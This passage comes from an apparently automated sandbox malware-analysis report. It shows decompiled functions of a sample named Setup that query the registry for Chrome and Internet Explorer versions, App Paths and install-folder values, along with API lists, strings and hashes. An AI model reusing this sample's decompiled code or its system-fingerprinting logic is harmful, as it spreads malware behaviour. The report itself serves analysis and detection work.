				_t77 = __esi;
				_t76 = __edi;
				_t55 = __ebx;
				_push(0xffffffff);
				_push(0x50eabb);
				_push( *[fs:0x0]);
				_t30 =  *0x561244; // 0xddd124f9
				_t31 = _t30 ^ _t78;
				_v32 = _t31;
				_push(_t31);
				 *[fs:0x0] =  &_v16;
				if(( *0x5c3048 & 0x00000001) == 0) {
					 *0x5c3048 =  *0x5c3048 | 0x00000001;
					_v8 = 0;
					_t54 = E0048C830(__ebx, __edi, __esi,  *0x5c3048 | 0x00000001); // executed
					asm("sbb edx, edx");
					_t73 =  ~( ~(_t54 & 0x000000ff));
					 *0x5c3044 =  ~( ~(_t54 & 0x000000ff));
					_v8 = 0xffffffff;
				}
				if( *0x5c3044 <= 1) {
					E00434E30( &_v24);
					_v8 = 1;
					_t36 = E0041EEA0( &_v24, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Google Chrome\\", 1); // executed
					__eflags = _t36;
					if(_t36 != 0) {
						E004175C0(E00434050( &_v129));
						_v8 = 2;
						_t73 =  &_v128;
						E0048C630(_t55, _t76, _t77, __eflags,  &_v128);
						E00427FD0(_t55, _t76, _t77, __eflags,  &_v128);
						 *0x5c3044 = E00451CBD(PathFindFileNameW(E00416A30( &_v124)), 0, 0xa);
						_v8 = 1;
						E004176E0();
					} else {
						_v96 = 0;
						E00451D90(_t76,  &_v94, 0, 0x3e);
						_v28 = 0x20;
						_t73 =  &_v28;
						E0041EDE0( &_v24, L"Version",  &_v96,  &_v28); // executed
						 *0x5c3044 = E00451CBD( &_v96, 0, 0xa);
					}
					_v136 =  *0x5c3044;
					_v8 = 0xffffffff;
					E0041EF60( &_v24);
					_t47 = _v136;
				} else {
					_t47 =  *0x5c3044;
				}
				 *[fs:0x0] = _v16;
				return E0044F6C8(_t47, _t55, _v32 ^ _t78, _t73, _t76, _t77);
			}




















                                                                                                                                                              0x0048cc50
                                                                                                                                                              0x0048cc50
                                                                                                                                                              0x0048cc50
                                                                                                                                                              0x0048cc53
                                                                                                                                                              0x0048cc55
                                                                                                                                                              0x0048cc60
                                                                                                                                                              0x0048cc64
                                                                                                                                                              0x0048cc69
                                                                                                                                                              0x0048cc6b
                                                                                                                                                              0x0048cc6e
                                                                                                                                                              0x0048cc72
                                                                                                                                                              0x0048cc80
                                                                                                                                                              0x0048cc8b
                                                                                                                                                              0x0048cc91
                                                                                                                                                              0x0048cc98
                                                                                                                                                              0x0048cca2
                                                                                                                                                              0x0048cca4
                                                                                                                                                              0x0048cca6
                                                                                                                                                              0x0048ccac
                                                                                                                                                              0x0048ccac
                                                                                                                                                              0x0048ccba
                                                                                                                                                              0x0048ccc9
                                                                                                                                                              0x0048ccce
                                                                                                                                                              0x0048cce4
                                                                                                                                                              0x0048cce9
                                                                                                                                                              0x0048cceb
                                                                                                                                                              0x0048cd42
                                                                                                                                                              0x0048cd47
                                                                                                                                                              0x0048cd4b
                                                                                                                                                              0x0048cd4f
                                                                                                                                                              0x0048cd5b
                                                                                                                                                              0x0048cd7f
                                                                                                                                                              0x0048cd84
                                                                                                                                                              0x0048cd8b
                                                                                                                                                              0x0048cced
                                                                                                                                                              0x0048ccef
                                                                                                                                                              0x0048ccfb
                                                                                                                                                              0x0048cd03
                                                                                                                                                              0x0048cd0a
                                                                                                                                                              0x0048cd1a
                                                                                                                                                              0x0048cd2f
                                                                                                                                                              0x0048cd2f
                                                                                                                                                              0x0048cd96
                                                                                                                                                              0x0048cd9c
                                                                                                                                                              0x0048cda6
                                                                                                                                                              0x0048cdab
                                                                                                                                                              0x0048ccbc
                                                                                                                                                              0x0048ccbc
                                                                                                                                                              0x0048ccbc
                                                                                                                                                              0x0048cdb4
                                                                                                                                                              0x0048cdc9

                                                                                                                                                              APIs
                                                                                                                                                              • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0048CCC9
                                                                                                                                                                • Part of subcall function 0041EEA0: RegOpenKeyExW.KERNEL32(00000001,?,00000000,00000000,00000000,Software\Microsoft\Internet Explorer\,00000001), ref: 0041EECA
                                                                                                                                                              • _memset.LIBCMT ref: 0048CCFB
                                                                                                                                                                • Part of subcall function 0041EDE0: RegQueryValueExW.KERNEL32(00000020,00000001,00000000,00000020,?,00000001,0047F702,svcVersion,00000001,00000020,Software\Microsoft\Internet Explorer\,00000001,DDD124F9), ref: 0041EE1C
                                                                                                                                                              • __wcstoi64.LIBCMT ref: 0048CD27
                                                                                                                                                                • Part of subcall function 00451CBD: wcstoxl.LIBCMT ref: 00451CDE
                                                                                                                                                              • PathFindFileNameW.SHLWAPI(00000000,00000000,0000000A,?,DDD124F9), ref: 0048CD70
                                                                                                                                                              • __wcstoi64.LIBCMT ref: 0048CD77
                                                                                                                                                              Strings
                                                                                                                                                              • , xrefs: 0048CD03
                                                                                                                                                              • Version, xrefs: 0048CD12
                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\, xrefs: 0048CCD7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __wcstoi64$FileFindIterator_baseIterator_base::_NameOpenPathQueryValue_memsetstd::_wcstoxl
                                                                                                                                                              • String ID: $Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\$Version
                                                                                                                                                              • API String ID: 1568900015-1727943444
                                                                                                                                                              • Opcode ID: 521478ba815602622f90f5b8606e70cd6a66c0934ffa0e2284376f21bd9d5987
                                                                                                                                                              • Instruction ID: 835d22ece1afbabd0d8e238a4dcff697028dac8f7890ad11750f1be22d999115
                                                                                                                                                              • Opcode Fuzzy Hash: 521478ba815602622f90f5b8606e70cd6a66c0934ffa0e2284376f21bd9d5987
                                                                                                                                                              • Instruction Fuzzy Hash: DF41DF71D006089FCB24EBA4ED86BEDB7B4EB14704F10852EE516A72D1EB386708CB59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0047F670 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 80COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 984 47f670-47f69f 985 47f6a5-47f6ca call 434e30 call 41eea0 984->985 986 47f75a-47f75e 984->986 995 47f6cc-47f6fd call 451d90 call 41ede0 985->995 996 47f74b-47f755 call 41ef60 985->996 987 47f760-47f769 986->987 988 47f76b-47f788 call 44f6c8 986->988 987->988 1001 47f702-47f709 995->1001 996->986 1002 47f70b-47f727 call 41ede0 1001->1002 1003 47f72a-47f72e 1001->1003 1002->1003 1003->996 1005 47f730-47f748 call 452133 1003->1005 1005->996
                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E0047F670(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v16;
				char _v24;
				char _v28;
				signed int _v32;
				char _v94;
				char _v96;
				intOrPtr _v100;
				signed int _t28;
				signed int _t29;
				intOrPtr _t31;
				void* _t34;
				short _t36;
				intOrPtr _t39;
				void* _t43;
				void* _t58;
				signed int _t59;

				_t58 = __esi;
				_t57 = __edi;
				_t43 = __ebx;
				_push(0xffffffff);
				_push(0x5059c6);
				_push( *[fs:0x0]);
				_t28 =  *0x561244; // 0xddd124f9
				_t29 = _t28 ^ _t59;
				_v32 = _t29;
				_push(_t29);
				 *[fs:0x0] =  &_v16;
				if( *0x5c2144 == 0) {
					E00434E30( &_v24);
					_v8 = 0;
					_t34 = E0041EEA0( &_v24, 0x80000002, L"Software\\Microsoft\\Internet Explorer\\", 1); // executed
					if(_t34 == 0) {
						_t36 =  *0x5244e4; // 0x0
						_v96 = _t36;
						E00451D90(__edi,  &_v94, 0, 0x3e);
						_v28 = 0x20;
						_t56 =  &_v28;
						_t39 = E0041EDE0( &_v24, L"svcVersion",  &_v96,  &_v28); // executed
						_v100 = _t39;
						if(_v100 != 0) {
							_v28 = 0x20;
							_t56 =  &_v96;
							_v100 = E0041EDE0( &_v24, L"Version",  &_v96,  &_v28);
						}
						if(_v100 == 0) {
							_push(0x5c2148);
							E00452133( &_v96, L"%d.%d", 0x5c2144);
						}
					}
					_v8 = 0xffffffff;
					E0041EF60( &_v24); // executed
				}
				if(_a4 != 0) {
					_t56 =  *0x5c2148; // 0x1
					 *_a4 = _t56;
				}
				_t31 =  *0x5c2144; // 0xb
				 *[fs:0x0] = _v16;
				return E0044F6C8(_t31, _t43, _v32 ^ _t59, _t56, _t57, _t58);
			}




















                                                                                                                                                              0x0047f670
                                                                                                                                                              0x0047f670
                                                                                                                                                              0x0047f670
                                                                                                                                                              0x0047f673
                                                                                                                                                              0x0047f675
                                                                                                                                                              0x0047f680
                                                                                                                                                              0x0047f684
                                                                                                                                                              0x0047f689
                                                                                                                                                              0x0047f68b
                                                                                                                                                              0x0047f68e
                                                                                                                                                              0x0047f692
                                                                                                                                                              0x0047f69f
                                                                                                                                                              0x0047f6a8
                                                                                                                                                              0x0047f6ad
                                                                                                                                                              0x0047f6c3
                                                                                                                                                              0x0047f6ca
                                                                                                                                                              0x0047f6cc
                                                                                                                                                              0x0047f6d2
                                                                                                                                                              0x0047f6de
                                                                                                                                                              0x0047f6e6
                                                                                                                                                              0x0047f6ed
                                                                                                                                                              0x0047f6fd
                                                                                                                                                              0x0047f702
                                                                                                                                                              0x0047f709
                                                                                                                                                              0x0047f70b
                                                                                                                                                              0x0047f716
                                                                                                                                                              0x0047f727
                                                                                                                                                              0x0047f727
                                                                                                                                                              0x0047f72e
                                                                                                                                                              0x0047f730
                                                                                                                                                              0x0047f743
                                                                                                                                                              0x0047f748
                                                                                                                                                              0x0047f72e
                                                                                                                                                              0x0047f74b
                                                                                                                                                              0x0047f755
                                                                                                                                                              0x0047f755
                                                                                                                                                              0x0047f75e
                                                                                                                                                              0x0047f763
                                                                                                                                                              0x0047f769
                                                                                                                                                              0x0047f769
                                                                                                                                                              0x0047f76b
                                                                                                                                                              0x0047f773
                                                                                                                                                              0x0047f788

                                                                                                                                                              APIs
                                                                                                                                                              • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0047F6A8
                                                                                                                                                                • Part of subcall function 0041EEA0: RegOpenKeyExW.KERNEL32(00000001,?,00000000,00000000,00000000,Software\Microsoft\Internet Explorer\,00000001), ref: 0041EECA
                                                                                                                                                              • _memset.LIBCMT ref: 0047F6DE
                                                                                                                                                                • Part of subcall function 0041EDE0: RegQueryValueExW.KERNEL32(00000020,00000001,00000000,00000020,?,00000001,0047F702,svcVersion,00000001,00000020,Software\Microsoft\Internet Explorer\,00000001,DDD124F9), ref: 0041EE1C
                                                                                                                                                              • _swscanf.LIBCMT ref: 0047F743
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Iterator_baseIterator_base::_OpenQueryValue_memset_swscanfstd::_
                                                                                                                                                              • String ID: $%d.%d$Software\Microsoft\Internet Explorer\$Version$svcVersion
                                                                                                                                                              • API String ID: 1427520148-2889293724
                                                                                                                                                              • Opcode ID: d6e4a18a42091573337230af4ee22e0c88e750f7268c64f949c79d1e53797a00
                                                                                                                                                              • Instruction ID: a19b341dfb138a983270e55979cb8246c53d88c77a451253226e6c69376a3b92
                                                                                                                                                              • Opcode Fuzzy Hash: d6e4a18a42091573337230af4ee22e0c88e750f7268c64f949c79d1e53797a00
                                                                                                                                                              • Instruction Fuzzy Hash: 33316B74900208AFDB14DFA5D946FEEB774FB14704F00852EE9196B2D0E7781A49CB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00482D30 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                              			E00482D30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v48;
				void* _v52;
				char _v60;
				char _v584;
				char _v588;
				char _v620;
				char _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				char _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				signed int _t62;
				signed int _t63;
				intOrPtr _t67;
				void* _t75;
				signed int _t142;

				_t141 = __esi;
				_t140 = __edi;
				_t99 = __ebx;
				_push(0xffffffff);
				_push(0x50a749);
				_push( *[fs:0x0]);
				_t62 =  *0x561244; // 0xddd124f9
				_t63 = _t62 ^ _t142;
				_v20 = _t63;
				_push(_t63);
				 *[fs:0x0] =  &_v16;
				E00434E30( &_v60);
				_v8 = 0;
				_t67 = E00482980(__ebx, __edi, __esi, __eflags,  &_v620, "LIpq0hKVkVaLMSLNpdvbwZ1ujeVTM3C6kW4BzYpnFeY3Qs6E"); // executed
				_v656 = _t67;
				_v660 = _v656;
				_v8 = 1;
				_v664 = _v660;
				if(_v664 == 0) {
					_v668 = 0;
				} else {
					_v668 = _v664 + 4;
				}
				_t138 =  &_v648;
				_v672 = E00409760( &_v648, L"Software\\", _v668);
				_v676 = _v672;
				_v8 = 2;
				E00409810(_v676);
				_v8 = 4;
				E004178C0( &_v648);
				_v8 = 5;
				E004176E0();
				E00405140(_a4 + 4);
				_t75 = E0041EEA0( &_v60, 0x80000001, E00416A30( &_v48), 1); // executed
				if(_t75 == 0) {
					_v588 = 0x104;
					_t138 =  &_v588;
					if(E0041EDE0( &_v60, L"INSTALL_FOLDER_NAME",  &_v584,  &_v588) == 0) {
						E00495D00(_t99, _t140, _t141, 0x23, _a4, 1, 1);
						E004130A0(_t99, E004130A0(_t99, _a4 + 4, _t140, _t141,  &_v584), _t140, _t141, "\\");
						_v588 = 0x104;
						E0041EDE0( &_v60, L"version",  &_v584,  &_v588);
						_t138 =  &_v584;
						E004130A0(_t99, E004130A0(_t99, _a4 + 4, _t140, _t141,  &_v584), _t140, _t141, "\\");
						_v588 = 0x104;
						if(E0041EDE0( &_v60, L"GUID",  &_v584,  &_v588) == 0) {
							_t138 =  &_v584;
							E004130A0(_t99, E004130A0(_t99, _a4 + 4, _t140, _t141,  &_v584), _t140, _t141, "\\");
							if((E00482950(_a4) & 0x000000ff) == 0) {
								E00405140(_a4 + 4);
							}
						}
					}
				}
				_v652 = E0042E0C0(_a4 + 4);
				_v8 = 0;
				E004176E0();
				_v8 = 0xffffffff;
				E0041EF60( &_v60);
				 *[fs:0x0] = _v16;
				_t60 =  &_v20; // 0x482fe9
				return E0044F6C8(_v652, _t99,  *_t60 ^ _t142, _t138, _t140, _t141);
			}

























                                                                                                                                                              0x00482d30
                                                                                                                                                              0x00482d30
                                                                                                                                                              0x00482d30
                                                                                                                                                              0x00482d33
                                                                                                                                                              0x00482d35
                                                                                                                                                              0x00482d40
                                                                                                                                                              0x00482d47
                                                                                                                                                              0x00482d4c
                                                                                                                                                              0x00482d4e
                                                                                                                                                              0x00482d51
                                                                                                                                                              0x00482d55
                                                                                                                                                              0x00482d5e
                                                                                                                                                              0x00482d63
                                                                                                                                                              0x00482d76
                                                                                                                                                              0x00482d7e
                                                                                                                                                              0x00482d8a
                                                                                                                                                              0x00482d90
                                                                                                                                                              0x00482d9a
                                                                                                                                                              0x00482da7
                                                                                                                                                              0x00482dba
                                                                                                                                                              0x00482da9
                                                                                                                                                              0x00482db2
                                                                                                                                                              0x00482db2
                                                                                                                                                              0x00482dd0
                                                                                                                                                              0x00482ddf
                                                                                                                                                              0x00482deb
                                                                                                                                                              0x00482df1
                                                                                                                                                              0x00482dff
                                                                                                                                                              0x00482e04
                                                                                                                                                              0x00482e0e
                                                                                                                                                              0x00482e13
                                                                                                                                                              0x00482e1d
                                                                                                                                                              0x00482e28
                                                                                                                                                              0x00482e40
                                                                                                                                                              0x00482e47
                                                                                                                                                              0x00482e4d
                                                                                                                                                              0x00482e57
                                                                                                                                                              0x00482e74
                                                                                                                                                              0x00482e84
                                                                                                                                                              0x00482ea5
                                                                                                                                                              0x00482eaa
                                                                                                                                                              0x00482eca
                                                                                                                                                              0x00482ed4
                                                                                                                                                              0x00482ee8
                                                                                                                                                              0x00482eed
                                                                                                                                                              0x00482f14
                                                                                                                                                              0x00482f1b
                                                                                                                                                              0x00482f2f
                                                                                                                                                              0x00482f45
                                                                                                                                                              0x00482f4d
                                                                                                                                                              0x00482f4d
                                                                                                                                                              0x00482f45
                                                                                                                                                              0x00482f14
                                                                                                                                                              0x00482e74
                                                                                                                                                              0x00482f5d
                                                                                                                                                              0x00482f63
                                                                                                                                                              0x00482f6a
                                                                                                                                                              0x00482f6f
                                                                                                                                                              0x00482f79
                                                                                                                                                              0x00482f87
                                                                                                                                                              0x00482f8f
                                                                                                                                                              0x00482f9c

                                                                                                                                                              APIs
                                                                                                                                                              • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00482D5E
                                                                                                                                                                • Part of subcall function 00482980: __wsplitpath.LIBCMT ref: 00482A17
                                                                                                                                                                • Part of subcall function 00482980: PathAddBackslashW.SHLWAPI(?), ref: 00482A26
                                                                                                                                                                • Part of subcall function 00482980: GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00482A43
                                                                                                                                                                • Part of subcall function 00482980: _sprintf.LIBCMT ref: 00482A59
                                                                                                                                                                • Part of subcall function 00482980: _strlen.LIBCMT ref: 00482A6F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BackslashInformationIterator_baseIterator_base::_PathVolume__wsplitpath_sprintf_strlenstd::_
                                                                                                                                                              • String ID: GUID$INSTALL_FOLDER_NAME$LIpq0hKVkVaLMSLNpdvbwZ1ujeVTM3C6kW4BzYpnFeY3Qs6E$Software\$version$/H
                                                                                                                                                              • API String ID: 296098145-1771210073
                                                                                                                                                              • Opcode ID: 3f38cdbd748789065e946d3ff6c62db60fb7ea56a97dfecbf67fa942f62a7179
                                                                                                                                                              • Instruction ID: a4e47fa03a4ea7bb8f9dc1b7f546aa884ffc29575824f17271174dd53e9144ec
                                                                                                                                                              • Opcode Fuzzy Hash: 3f38cdbd748789065e946d3ff6c62db60fb7ea56a97dfecbf67fa942f62a7179
                                                                                                                                                              • Instruction Fuzzy Hash: 7B619F70900119AFDB14EF65DD9ABEDBBB4EF04308F4041AEF50967281EB746A84CF94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00495E20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00495E20(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				char _v24;
				signed int _v28;
				char _v56;
				void* _v60;
				char _v582;
				short _v584;
				char _v588;
				char _v589;
				char _v624;
				char _v625;
				intOrPtr _v632;
				char _v636;
				signed int _t51;
				signed int _t52;
				void* _t60;
				intOrPtr _t63;
				void* _t67;
				void* _t80;
				void* _t110;
				signed int _t111;

				_t110 = __esi;
				_t109 = __edi;
				_t80 = __ebx;
				_push(0xffffffff);
				_push(0x508587);
				_push( *[fs:0x0]);
				_t51 =  *0x561244; // 0xddd124f9
				_t52 = _t51 ^ _t111;
				_v28 = _t52;
				_push(_t52);
				 *[fs:0x0] =  &_v16;
				E00434E30( &_v24);
				_v8 = 0;
				E00417910(L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\", E00434050( &_v589));
				_v8 = 1;
				E004130D0( &_v56, _a4);
				_t60 = E0041EEA0( &_v24, 0x80000002, E00416A30( &_v56), 1); // executed
				if(_t60 != 0) {
					L5:
					_v636 = 0;
					_v8 = 0;
					E004176E0();
					_v8 = 0xffffffff;
					E0041EF60( &_v24);
					_t63 = _v636;
				} else {
					_v584 = 0;
					_t106 =  &_v582;
					E00451D90(__edi,  &_v582, 0, 0x206);
					_v588 = 0x104;
					_t67 = E0041EDE0( &_v24, L"Path",  &_v584,  &_v588); // executed
					if(_t67 != 0) {
						goto L5;
					} else {
						if(( *(_t111 + E0044F9A4( &_v584) * 2 - 0x246) & 0x0000ffff) == 0x3b) {
							 *(_t111 + E0044F9A4( &_v584) * 2 - 0x246) = 0;
						}
						PathAddBackslashW( &_v584);
						E00417910( &_v584, E00434050( &_v625));
						_v8 = 2;
						_t106 =  &_v624;
						E004181D0(_a8,  &_v624);
						_v8 = 1;
						E004176E0();
						_v632 = E0042E0C0(_a8 + 4);
						_v8 = 0;
						E004176E0();
						_v8 = 0xffffffff;
						E0041EF60( &_v24); // executed
						_t63 = _v632;
					}
				}
				 *[fs:0x0] = _v16;
				return E0044F6C8(_t63, _t80, _v28 ^ _t111, _t106, _t109, _t110);
			}

























                                                                                                                                                              0x00495e20
                                                                                                                                                              0x00495e20
                                                                                                                                                              0x00495e20
                                                                                                                                                              0x00495e23
                                                                                                                                                              0x00495e25
                                                                                                                                                              0x00495e30
                                                                                                                                                              0x00495e37
                                                                                                                                                              0x00495e3c
                                                                                                                                                              0x00495e3e
                                                                                                                                                              0x00495e41
                                                                                                                                                              0x00495e45
                                                                                                                                                              0x00495e4e
                                                                                                                                                              0x00495e53
                                                                                                                                                              0x00495e6e
                                                                                                                                                              0x00495e73
                                                                                                                                                              0x00495e7e
                                                                                                                                                              0x00495e96
                                                                                                                                                              0x00495e9d
                                                                                                                                                              0x00495fa5
                                                                                                                                                              0x00495fa5
                                                                                                                                                              0x00495faf
                                                                                                                                                              0x00495fb6
                                                                                                                                                              0x00495fbb
                                                                                                                                                              0x00495fc5
                                                                                                                                                              0x00495fca
                                                                                                                                                              0x00495ea3
                                                                                                                                                              0x00495ea5
                                                                                                                                                              0x00495eb3
                                                                                                                                                              0x00495eba
                                                                                                                                                              0x00495ec2
                                                                                                                                                              0x00495ee2
                                                                                                                                                              0x00495ee9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00495eef
                                                                                                                                                              0x00495f09
                                                                                                                                                              0x00495f1c
                                                                                                                                                              0x00495f1c
                                                                                                                                                              0x00495f2b
                                                                                                                                                              0x00495f4a
                                                                                                                                                              0x00495f4f
                                                                                                                                                              0x00495f53
                                                                                                                                                              0x00495f5d
                                                                                                                                                              0x00495f62
                                                                                                                                                              0x00495f6c
                                                                                                                                                              0x00495f7c
                                                                                                                                                              0x00495f82
                                                                                                                                                              0x00495f89
                                                                                                                                                              0x00495f8e
                                                                                                                                                              0x00495f98
                                                                                                                                                              0x00495f9d
                                                                                                                                                              0x00495f9d
                                                                                                                                                              0x00495ee9
                                                                                                                                                              0x00495fd3
                                                                                                                                                              0x00495fe8

                                                                                                                                                              APIs
                                                                                                                                                              • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00495E4E
                                                                                                                                                                • Part of subcall function 0041EEA0: RegOpenKeyExW.KERNEL32(00000001,?,00000000,00000000,00000000,Software\Microsoft\Internet Explorer\,00000001), ref: 0041EECA
                                                                                                                                                              • _memset.LIBCMT ref: 00495EBA
                                                                                                                                                                • Part of subcall function 0041EDE0: RegQueryValueExW.KERNEL32(00000020,00000001,00000000,00000020,?,00000001,0047F702,svcVersion,00000001,00000020,Software\Microsoft\Internet Explorer\,00000001,DDD124F9), ref: 0041EE1C
                                                                                                                                                              • _wcslen.LIBCMT ref: 00495EF6
                                                                                                                                                              • _wcslen.LIBCMT ref: 00495F12
                                                                                                                                                              • PathAddBackslashW.SHLWAPI(?,00000104,Software\Microsoft\Windows\CurrentVersion\App Paths\,00000000,DDD124F9), ref: 00495F2B
                                                                                                                                                              Strings
                                                                                                                                                              • Path, xrefs: 00495EDA
                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 00495E66
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcslen$BackslashIterator_baseIterator_base::_OpenPathQueryValue_memsetstd::_
                                                                                                                                                              • String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\
                                                                                                                                                              • API String ID: 3112264913-2411794369
                                                                                                                                                              • Opcode ID: 9858bae1cb6e7f8e7ffce5cb7abdc62c11148b2b35d92f645035fd6855e72792
                                                                                                                                                              • Instruction ID: 0e721211a411d4d4bd81d772e4ff45de3ad52a7a022707b1392635551f2e36b6
                                                                                                                                                              • Opcode Fuzzy Hash: 9858bae1cb6e7f8e7ffce5cb7abdc62c11148b2b35d92f645035fd6855e72792
                                                                                                                                                              • Instruction Fuzzy Hash: 4441AF70904108AADB14EB65DD4ABEEB774EF14314F2041AEF40AA71D1EF782F88CB55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00424280 Relevance: 12.2, APIs: 8, Instructions: 154COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
